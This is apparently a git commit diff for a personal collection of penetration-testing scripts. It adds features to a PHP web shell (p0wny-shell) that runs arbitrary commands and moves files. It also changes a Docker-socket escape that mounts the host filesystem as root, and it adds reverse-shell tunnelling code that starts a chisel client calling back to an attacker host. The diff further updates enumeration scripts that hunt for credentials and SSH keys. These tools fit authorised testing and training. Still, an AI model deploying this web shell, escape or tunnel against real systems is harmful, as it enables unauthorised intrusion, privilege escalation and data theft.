Update Dependencies + paramiko port forwarding + some bug fixes
This commit is contained in:
parent
9e6432d976
commit
b1380967a4
@ -2,6 +2,12 @@
|
|||||||
|
|
||||||
This repository contains self-made and common scripts for information gathering, enumeration and more.
|
This repository contains self-made and common scripts for information gathering, enumeration and more.
|
||||||
|
|
||||||
|
### Installation
|
||||||
|
```bash
|
||||||
|
git clone git@romanh.de:Roman/HackingScripts
|
||||||
|
sudo ln -s HackingScripts $(python -c "import sys;print(sys.path[-1])")/hackingscripts
|
||||||
|
```
|
||||||
|
|
||||||
### Enumeration: Initial Scans
|
### Enumeration: Initial Scans
|
||||||
- first_scan.sh: Performs initial nmap scan
|
- first_scan.sh: Performs initial nmap scan
|
||||||
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt
|
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt
|
||||||
|
BIN
chisel
BIN
chisel
Binary file not shown.
BIN
chisel64
BIN
chisel64
Binary file not shown.
21
deepce.sh
21
deepce.sh
@ -129,7 +129,7 @@ TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container
|
|||||||
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
|
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
|
||||||
|
|
||||||
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
|
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
|
||||||
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
|
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override\|cap_sys_rawio\|cap_mknod"
|
||||||
|
|
||||||
CONTAINER_CMDS="docker lxc rkt kubectl podman"
|
CONTAINER_CMDS="docker lxc rkt kubectl podman"
|
||||||
USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
|
USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
|
||||||
@ -561,7 +561,13 @@ containerCapabilities() {
|
|||||||
printNo
|
printNo
|
||||||
fi
|
fi
|
||||||
else
|
else
|
||||||
printError "Unknown (capsh not installed)"
|
caps=$(grep Cap /proc/self/status)
|
||||||
|
capEff=$(grep CapEff /proc/self/status | cut -d ':' -f 2 | tr -d '\t')
|
||||||
|
printError "capsh not installed, listing raw capabilities"
|
||||||
|
printInstallAdvice "libcap2-bin"
|
||||||
|
printStatus "Current capabilities are:"
|
||||||
|
printStatus "$caps"
|
||||||
|
printStatus "> This can be decoded with: \"capsh --decode=${capEff}\""
|
||||||
fi
|
fi
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -1046,9 +1052,18 @@ exploitDockerSock() {
|
|||||||
|
|
||||||
nl
|
nl
|
||||||
|
|
||||||
|
# Try to find an available docker image
|
||||||
|
json_data=$(curl -s --unix-socket /var/run/docker.sock http://localhost/images/json)
|
||||||
|
docker_img=$(echo "$json_data" | grep -o '"RepoTags":\["[^"]*' | grep -o '[^"]*$' | tail -1)
|
||||||
|
|
||||||
|
if [ -z "$docker_img" ]; then
|
||||||
|
printInfo 'No avaliable docker image found, using alpine'
|
||||||
|
docker_img="alpine"
|
||||||
|
fi
|
||||||
|
|
||||||
# Create docker container using the docker sock
|
# Create docker container using the docker sock
|
||||||
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
|
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
|
||||||
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
|
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"$docker_img\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
|
||||||
|
|
||||||
if ! [ $? ]; then
|
if ! [ $? ]; then
|
||||||
printError 'Something went wrong'
|
printError 'Something went wrong'
|
||||||
|
@ -137,7 +137,6 @@ class HttpFileServer(HTTPServer):
|
|||||||
self.prefix_routes = { }
|
self.prefix_routes = { }
|
||||||
self.is_running = True
|
self.is_running = True
|
||||||
self.listen_thread = None
|
self.listen_thread = None
|
||||||
self.has_exited = False
|
|
||||||
|
|
||||||
def cleanPath(self, path):
|
def cleanPath(self, path):
|
||||||
|
|
||||||
@ -231,9 +230,6 @@ class HttpFileServer(HTTPServer):
|
|||||||
self.listen_thread.start()
|
self.listen_thread.start()
|
||||||
return self.listen_thread
|
return self.listen_thread
|
||||||
|
|
||||||
def start(self):
|
|
||||||
return self.serve_forever()
|
|
||||||
|
|
||||||
def get_base_url():
|
def get_base_url():
|
||||||
addr, port = self.server_address
|
addr, port = self.server_address
|
||||||
if port != 80:
|
if port != 80:
|
||||||
@ -243,28 +239,11 @@ class HttpFileServer(HTTPServer):
|
|||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
self.is_running = False
|
self.is_running = False
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
self.shutdown()
|
||||||
try:
|
|
||||||
# dummy request
|
|
||||||
for i in range(3):
|
|
||||||
requests.get(f"{self.get_base_url()}/dummy")
|
|
||||||
if self.has_exited:
|
|
||||||
break
|
|
||||||
time.sleep(1)
|
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
||||||
if self.listen_thread != threading.currentThread():
|
if self.listen_thread != threading.currentThread():
|
||||||
self.listen_thread.join()
|
self.listen_thread.join()
|
||||||
|
|
||||||
def serve_forever(self):
|
|
||||||
self.has_exited = False
|
|
||||||
while self.is_running:
|
|
||||||
self.handle_request()
|
|
||||||
self.has_exited = True
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
|
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
|
||||||
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
||||||
|
2760
linpeas.sh
2760
linpeas.sh
File diff suppressed because one or more lines are too long
@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
#
|
#
|
||||||
# Copyright (c) 2016-2022, @_mzet_
|
# Copyright (c) 2016-2023, https://github.com/mzet-
|
||||||
#
|
#
|
||||||
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
||||||
# This is free software, and you are welcome to redistribute it
|
# This is free software, and you are welcome to redistribute it
|
||||||
|
9
lse.sh
9
lse.sh
@ -5,7 +5,7 @@
|
|||||||
# Author: Diego Blanco <diego.blanco@treitos.com>
|
# Author: Diego Blanco <diego.blanco@treitos.com>
|
||||||
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
||||||
#
|
#
|
||||||
lse_version="4.10nw"
|
lse_version="4.13nw"
|
||||||
|
|
||||||
##( Colors
|
##( Colors
|
||||||
#
|
#
|
||||||
@ -611,6 +611,7 @@ lse_get_distro_codename() { #(
|
|||||||
elif [ -f /etc/os-release ]; then
|
elif [ -f /etc/os-release ]; then
|
||||||
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
|
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
|
||||||
echo "$distro" | grep -qi opensuse && distro=opsuse
|
echo "$distro" | grep -qi opensuse && distro=opsuse
|
||||||
|
echo "$distro" | grep -qi rhel && distro=redhat
|
||||||
elif [ -f /etc/redhat-release ]; then
|
elif [ -f /etc/redhat-release ]; then
|
||||||
grep -qi "centos" /etc/redhat-release && distro=centos
|
grep -qi "centos" /etc/redhat-release && distro=centos
|
||||||
grep -qi "fedora" /etc/redhat-release && distro=fedora
|
grep -qi "fedora" /etc/redhat-release && distro=fedora
|
||||||
@ -635,7 +636,7 @@ lse_get_pkg_version() { #(
|
|||||||
pkg_name="$1"
|
pkg_name="$1"
|
||||||
case "$lse_distro_codename" in
|
case "$lse_distro_codename" in
|
||||||
debian|ubuntu)
|
debian|ubuntu)
|
||||||
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
|
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3`
|
||||||
;;
|
;;
|
||||||
centos|redhat|fedora|opsuse|rocky|amzn)
|
centos|redhat|fedora|opsuse|rocky|amzn)
|
||||||
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
|
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
|
||||||
@ -845,7 +846,7 @@ lse_run_tests_filesystem() {
|
|||||||
#looking for credentials in /etc/fstab and /etc/mtab
|
#looking for credentials in /etc/fstab and /etc/mtab
|
||||||
lse_test "fst120" "0" \
|
lse_test "fst120" "0" \
|
||||||
"Are there any credentials in fstab/mtab?" \
|
"Are there any credentials in fstab/mtab?" \
|
||||||
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab'
|
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab'
|
||||||
|
|
||||||
#check if current user has mail
|
#check if current user has mail
|
||||||
lse_test "fst130" "1" \
|
lse_test "fst130" "1" \
|
||||||
@ -910,7 +911,7 @@ lse_run_tests_filesystem() {
|
|||||||
#check for SSH files anywhere
|
#check for SSH files anywhere
|
||||||
lse_test "fst510" "2" \
|
lse_test "fst510" "2" \
|
||||||
"SSH files anywhere" \
|
"SSH files anywhere" \
|
||||||
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
|
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
|
||||||
|
|
||||||
#dump hosts.equiv file
|
#dump hosts.equiv file
|
||||||
lse_test "fst520" "2" \
|
lse_test "fst520" "2" \
|
||||||
|
156
p0wny-shell.php
156
p0wny-shell.php
@ -1,5 +1,10 @@
|
|||||||
<?php
|
<?php
|
||||||
|
|
||||||
|
$SHELL_CONFIG = array(
|
||||||
|
'username' => 'p0wny',
|
||||||
|
'hostname' => 'shell',
|
||||||
|
);
|
||||||
|
|
||||||
function expandPath($path) {
|
function expandPath($path) {
|
||||||
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
||||||
exec("echo $match[1]", $stdout);
|
exec("echo $match[1]", $stdout);
|
||||||
@ -8,8 +13,52 @@ function expandPath($path) {
|
|||||||
return $path;
|
return $path;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function allFunctionExist($list = array()) {
|
||||||
|
foreach ($list as $entry) {
|
||||||
|
if (!function_exists($entry)) {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
function executeCommand($cmd) {
|
||||||
|
$output = '';
|
||||||
|
if (function_exists('exec')) {
|
||||||
|
exec($cmd, $output);
|
||||||
|
$output = implode("\n", $output);
|
||||||
|
} else if (function_exists('shell_exec')) {
|
||||||
|
$output = shell_exec($cmd);
|
||||||
|
} else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
||||||
|
ob_start();
|
||||||
|
system($cmd);
|
||||||
|
$output = ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
} else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
||||||
|
ob_start();
|
||||||
|
passthru($cmd);
|
||||||
|
$output = ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
} else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
|
||||||
|
$handle = popen($cmd, 'r');
|
||||||
|
while (!feof($handle)) {
|
||||||
|
$output .= fread($handle, 4096);
|
||||||
|
}
|
||||||
|
pclose($handle);
|
||||||
|
} else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
|
||||||
|
$handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
|
||||||
|
$output = stream_get_contents($pipes[1]);
|
||||||
|
proc_close($handle);
|
||||||
|
}
|
||||||
|
return $output;
|
||||||
|
}
|
||||||
|
|
||||||
|
function isRunningWindows() {
|
||||||
|
return stripos(PHP_OS, "WIN") === 0;
|
||||||
|
}
|
||||||
|
|
||||||
function featureShell($cmd, $cwd) {
|
function featureShell($cmd, $cwd) {
|
||||||
$stdout = array();
|
$stdout = "";
|
||||||
|
|
||||||
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
||||||
chdir(expandPath("~"));
|
chdir(expandPath("~"));
|
||||||
@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) {
|
|||||||
return featureDownload($match[1]);
|
return featureDownload($match[1]);
|
||||||
} else {
|
} else {
|
||||||
chdir($cwd);
|
chdir($cwd);
|
||||||
exec($cmd, $stdout);
|
$stdout = executeCommand($cmd);
|
||||||
}
|
}
|
||||||
|
|
||||||
return array(
|
return array(
|
||||||
"stdout" => $stdout,
|
"stdout" => base64_encode($stdout),
|
||||||
"cwd" => getcwd()
|
"cwd" => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
function featurePwd() {
|
function featurePwd() {
|
||||||
return array("cwd" => getcwd());
|
return array("cwd" => base64_encode(getcwd()));
|
||||||
}
|
}
|
||||||
|
|
||||||
function featureHint($fileName, $cwd, $type) {
|
function featureHint($fileName, $cwd, $type) {
|
||||||
@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) {
|
|||||||
}
|
}
|
||||||
$cmd = "/bin/bash -c \"$cmd\"";
|
$cmd = "/bin/bash -c \"$cmd\"";
|
||||||
$files = explode("\n", shell_exec($cmd));
|
$files = explode("\n", shell_exec($cmd));
|
||||||
|
foreach ($files as &$filename) {
|
||||||
|
$filename = base64_encode($filename);
|
||||||
|
}
|
||||||
return array(
|
return array(
|
||||||
'files' => $files,
|
'files' => $files,
|
||||||
);
|
);
|
||||||
@ -54,12 +106,12 @@ function featureDownload($filePath) {
|
|||||||
$file = @file_get_contents($filePath);
|
$file = @file_get_contents($filePath);
|
||||||
if ($file === FALSE) {
|
if ($file === FALSE) {
|
||||||
return array(
|
return array(
|
||||||
'stdout' => array('File not found / no read permission.'),
|
'stdout' => base64_encode('File not found / no read permission.'),
|
||||||
'cwd' => getcwd()
|
'cwd' => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
return array(
|
return array(
|
||||||
'name' => basename($filePath),
|
'name' => base64_encode(basename($filePath)),
|
||||||
'file' => base64_encode($file)
|
'file' => base64_encode($file)
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) {
|
|||||||
$f = @fopen($path, 'wb');
|
$f = @fopen($path, 'wb');
|
||||||
if ($f === FALSE) {
|
if ($f === FALSE) {
|
||||||
return array(
|
return array(
|
||||||
'stdout' => array('Invalid path / no write permission.'),
|
'stdout' => base64_encode('Invalid path / no write permission.'),
|
||||||
'cwd' => getcwd()
|
'cwd' => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
fwrite($f, base64_decode($file));
|
fwrite($f, base64_decode($file));
|
||||||
fclose($f);
|
fclose($f);
|
||||||
return array(
|
return array(
|
||||||
'stdout' => array('Done.'),
|
'stdout' => base64_encode('Done.'),
|
||||||
'cwd' => getcwd()
|
'cwd' => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function initShellConfig() {
|
||||||
|
global $SHELL_CONFIG;
|
||||||
|
|
||||||
|
if (isRunningWindows()) {
|
||||||
|
$username = getenv('USERNAME');
|
||||||
|
if ($username !== false) {
|
||||||
|
$SHELL_CONFIG['username'] = $username;
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$pwuid = posix_getpwuid(posix_geteuid());
|
||||||
|
if ($pwuid !== false) {
|
||||||
|
$SHELL_CONFIG['username'] = $pwuid['name'];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$hostname = gethostname();
|
||||||
|
if ($hostname !== false) {
|
||||||
|
$SHELL_CONFIG['hostname'] = $hostname;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
if (isset($_GET["feature"])) {
|
if (isset($_GET["feature"])) {
|
||||||
|
|
||||||
$response = NULL;
|
$response = NULL;
|
||||||
@ -108,6 +181,8 @@ if (isset($_GET["feature"])) {
|
|||||||
header("Content-Type: application/json");
|
header("Content-Type: application/json");
|
||||||
echo json_encode($response);
|
echo json_encode($response);
|
||||||
die();
|
die();
|
||||||
|
} else {
|
||||||
|
initShellConfig();
|
||||||
}
|
}
|
||||||
|
|
||||||
?><!DOCTYPE html>
|
?><!DOCTYPE html>
|
||||||
@ -125,6 +200,9 @@ if (isset($_GET["feature"])) {
|
|||||||
background: #333;
|
background: #333;
|
||||||
color: #eee;
|
color: #eee;
|
||||||
font-family: monospace;
|
font-family: monospace;
|
||||||
|
width: 100vw;
|
||||||
|
height: 100vh;
|
||||||
|
overflow: hidden;
|
||||||
}
|
}
|
||||||
|
|
||||||
*::-webkit-scrollbar-track {
|
*::-webkit-scrollbar-track {
|
||||||
@ -145,17 +223,21 @@ if (isset($_GET["feature"])) {
|
|||||||
|
|
||||||
#shell {
|
#shell {
|
||||||
background: #222;
|
background: #222;
|
||||||
max-width: 800px;
|
|
||||||
margin: 50px auto 0 auto;
|
|
||||||
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
||||||
font-size: 10pt;
|
font-size: 10pt;
|
||||||
display: flex;
|
display: flex;
|
||||||
flex-direction: column;
|
flex-direction: column;
|
||||||
align-items: stretch;
|
align-items: stretch;
|
||||||
|
max-width: calc(100vw - 2 * var(--shell-margin));
|
||||||
|
max-height: calc(100vh - 2 * var(--shell-margin));
|
||||||
|
resize: both;
|
||||||
|
overflow: hidden;
|
||||||
|
width: 100%;
|
||||||
|
height: 100%;
|
||||||
|
margin: var(--shell-margin) auto;
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell-content {
|
#shell-content {
|
||||||
height: 500px;
|
|
||||||
overflow: auto;
|
overflow: auto;
|
||||||
padding: 5px;
|
padding: 5px;
|
||||||
white-space: pre-wrap;
|
white-space: pre-wrap;
|
||||||
@ -168,20 +250,27 @@ if (isset($_GET["feature"])) {
|
|||||||
text-align: center;
|
text-align: center;
|
||||||
}
|
}
|
||||||
|
|
||||||
@media (max-width: 991px) {
|
:root {
|
||||||
|
--shell-margin: 25px;
|
||||||
|
}
|
||||||
|
|
||||||
|
@media (min-width: 1200px) {
|
||||||
|
:root {
|
||||||
|
--shell-margin: 50px !important;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
@media (max-width: 991px),
|
||||||
|
(max-height: 600px) {
|
||||||
#shell-logo {
|
#shell-logo {
|
||||||
font-size: 6px;
|
font-size: 6px;
|
||||||
margin: -25px 0;
|
margin: -25px 0;
|
||||||
}
|
}
|
||||||
|
:root {
|
||||||
html, body, #shell {
|
--shell-margin: 0 !important;
|
||||||
height: 100%;
|
|
||||||
width: 100%;
|
|
||||||
max-width: none;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell {
|
#shell {
|
||||||
margin-top: 0;
|
resize: none;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -210,6 +299,7 @@ if (isset($_GET["feature"])) {
|
|||||||
display: flex;
|
display: flex;
|
||||||
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
||||||
border-top: rgba(255, 255, 255, .05) solid 1px;
|
border-top: rgba(255, 255, 255, .05) solid 1px;
|
||||||
|
padding: 10px 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell-input > label {
|
#shell-input > label {
|
||||||
@ -230,6 +320,7 @@ if (isset($_GET["feature"])) {
|
|||||||
font-size: 10pt;
|
font-size: 10pt;
|
||||||
width: 100%;
|
width: 100%;
|
||||||
align-self: center;
|
align-self: center;
|
||||||
|
box-sizing: border-box;
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell-input div {
|
#shell-input div {
|
||||||
@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {
|
|||||||
</style>
|
</style>
|
||||||
|
|
||||||
<script>
|
<script>
|
||||||
|
var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
|
||||||
var CWD = null;
|
var CWD = null;
|
||||||
var commandHistory = [];
|
var commandHistory = [];
|
||||||
var historyPosition = 0;
|
var historyPosition = 0;
|
||||||
@ -277,10 +369,10 @@ if (isset($_GET["feature"])) {
|
|||||||
} else {
|
} else {
|
||||||
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
||||||
if (response.hasOwnProperty('file')) {
|
if (response.hasOwnProperty('file')) {
|
||||||
featureDownload(response.name, response.file)
|
featureDownload(atob(response.name), response.file)
|
||||||
} else {
|
} else {
|
||||||
_insertStdout(response.stdout.join("\n"));
|
_insertStdout(atob(response.stdout));
|
||||||
updateCwd(response.cwd);
|
updateCwd(atob(response.cwd));
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
@ -291,7 +383,9 @@ if (isset($_GET["feature"])) {
|
|||||||
|
|
||||||
function _requestCallback(data) {
|
function _requestCallback(data) {
|
||||||
if (data.files.length <= 1) return; // no completion
|
if (data.files.length <= 1) return; // no completion
|
||||||
|
data.files = data.files.map(function(file){
|
||||||
|
return atob(file);
|
||||||
|
});
|
||||||
if (data.files.length === 2) {
|
if (data.files.length === 2) {
|
||||||
if (type === 'cmd') {
|
if (type === 'cmd') {
|
||||||
eShellCmdInput.value = data.files[0];
|
eShellCmdInput.value = data.files[0];
|
||||||
@ -341,8 +435,8 @@ if (isset($_GET["feature"])) {
|
|||||||
var promise = getBase64(element.files[0]);
|
var promise = getBase64(element.files[0]);
|
||||||
promise.then(function (file) {
|
promise.then(function (file) {
|
||||||
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
||||||
_insertStdout(response.stdout.join("\n"));
|
_insertStdout(atob(response.stdout));
|
||||||
updateCwd(response.cwd);
|
updateCwd(atob(response.cwd));
|
||||||
});
|
});
|
||||||
}, function () {
|
}, function () {
|
||||||
_insertStdout('An unknown client-side error occurred.');
|
_insertStdout('An unknown client-side error occurred.');
|
||||||
@ -368,7 +462,7 @@ if (isset($_GET["feature"])) {
|
|||||||
var splittedCwd = cwd.split("/");
|
var splittedCwd = cwd.split("/");
|
||||||
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
||||||
}
|
}
|
||||||
return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
||||||
}
|
}
|
||||||
|
|
||||||
function updateCwd(cwd) {
|
function updateCwd(cwd) {
|
||||||
@ -378,7 +472,7 @@ if (isset($_GET["feature"])) {
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
makeRequest("?feature=pwd", {}, function(response) {
|
makeRequest("?feature=pwd", {}, function(response) {
|
||||||
CWD = response.cwd;
|
CWD = atob(response.cwd);
|
||||||
_updatePrompt();
|
_updatePrompt();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
BIN
pspy
BIN
pspy
Binary file not shown.
BIN
pspy64
BIN
pspy64
Binary file not shown.
104
rev_shell.py
104
rev_shell.py
@ -11,6 +11,13 @@ import threading
|
|||||||
import paramiko
|
import paramiko
|
||||||
import readline
|
import readline
|
||||||
import base64
|
import base64
|
||||||
|
import select
|
||||||
|
|
||||||
|
|
||||||
|
try:
|
||||||
|
import SocketServer
|
||||||
|
except ImportError:
|
||||||
|
import socketserver as SocketServer
|
||||||
|
|
||||||
class ShellListener:
|
class ShellListener:
|
||||||
|
|
||||||
@ -162,6 +169,97 @@ class ShellListener:
|
|||||||
if permissions:
|
if permissions:
|
||||||
self.sendline(f"chmod {permissions} {path}")
|
self.sendline(f"chmod {permissions} {path}")
|
||||||
|
|
||||||
|
class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
|
||||||
|
daemon_threads = True
|
||||||
|
allow_reuse_address = True
|
||||||
|
|
||||||
|
|
||||||
|
class ParamikoTunnel:
|
||||||
|
def __init__(self, shell, ports):
|
||||||
|
self.shell = shell
|
||||||
|
self.ports = ports
|
||||||
|
self.verbose = False
|
||||||
|
self.is_running = True
|
||||||
|
self.on_message = []
|
||||||
|
self.listen_threads = []
|
||||||
|
self.servers = []
|
||||||
|
|
||||||
|
def start_background(self):
|
||||||
|
for port in self.ports:
|
||||||
|
thread = threading.Thread(target=self.start, args=(port, ))
|
||||||
|
thread.start()
|
||||||
|
self.listen_threads.append(thread)
|
||||||
|
return self.listen_threads
|
||||||
|
|
||||||
|
def start(self, port):
|
||||||
|
this = self
|
||||||
|
class SubHandler(ParamikoTunnelHandler):
|
||||||
|
peer = this.shell.get_transport().sock.getpeername()
|
||||||
|
chain_host = "127.0.0.1"
|
||||||
|
chain_port = port
|
||||||
|
ssh_transport = this.shell.get_transport()
|
||||||
|
def log(self, message):
|
||||||
|
if this.verbose:
|
||||||
|
print(message)
|
||||||
|
|
||||||
|
forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
|
||||||
|
self.servers.append(forward_server)
|
||||||
|
forward_server.serve_forever()
|
||||||
|
|
||||||
|
def close(self):
|
||||||
|
self.is_running = False
|
||||||
|
for server in self.servers:
|
||||||
|
server._BaseServer__shutdown_request = True
|
||||||
|
for thread in self.listen_threads:
|
||||||
|
thread.join()
|
||||||
|
|
||||||
|
class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
chan = self.ssh_transport.open_channel(
|
||||||
|
"direct-tcpip",
|
||||||
|
(self.chain_host, self.chain_port),
|
||||||
|
self.request.getpeername(),
|
||||||
|
)
|
||||||
|
except Exception as e:
|
||||||
|
self.log(
|
||||||
|
"Incoming request to %s:%d failed: %s"
|
||||||
|
% (self.chain_host, self.chain_port, repr(e))
|
||||||
|
)
|
||||||
|
return
|
||||||
|
if chan is None:
|
||||||
|
self.log(
|
||||||
|
"Incoming request to %s:%d was rejected by the SSH server."
|
||||||
|
% (self.chain_host, self.chain_port)
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
self.log(
|
||||||
|
"Connected! Tunnel open %r -> %r -> %r"
|
||||||
|
% (
|
||||||
|
self.request.getpeername(),
|
||||||
|
chan.getpeername(),
|
||||||
|
(self.chain_host, self.chain_port),
|
||||||
|
)
|
||||||
|
)
|
||||||
|
while True:
|
||||||
|
r, w, x = select.select([self.request, chan], [], [])
|
||||||
|
if self.request in r:
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if len(data) == 0:
|
||||||
|
break
|
||||||
|
chan.send(data)
|
||||||
|
if chan in r:
|
||||||
|
data = chan.recv(1024)
|
||||||
|
if len(data) == 0:
|
||||||
|
break
|
||||||
|
self.request.send(data)
|
||||||
|
|
||||||
|
peername = self.request.getpeername()
|
||||||
|
chan.close()
|
||||||
|
self.request.close()
|
||||||
|
self.log("Tunnel closed from %r" % (peername,))
|
||||||
|
|
||||||
def generate_payload(type, local_address, port, index=None):
|
def generate_payload(type, local_address, port, index=None):
|
||||||
|
|
||||||
commands = []
|
commands = []
|
||||||
@ -238,7 +336,13 @@ def create_tunnel(shell, ports: list):
|
|||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
|
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
|
||||||
|
return t
|
||||||
elif isinstance(shell, paramiko.SSHClient):
|
elif isinstance(shell, paramiko.SSHClient):
|
||||||
|
|
||||||
|
paramiko_tunnel = ParamikoTunnel(shell, ports)
|
||||||
|
paramiko_tunnel.start_background()
|
||||||
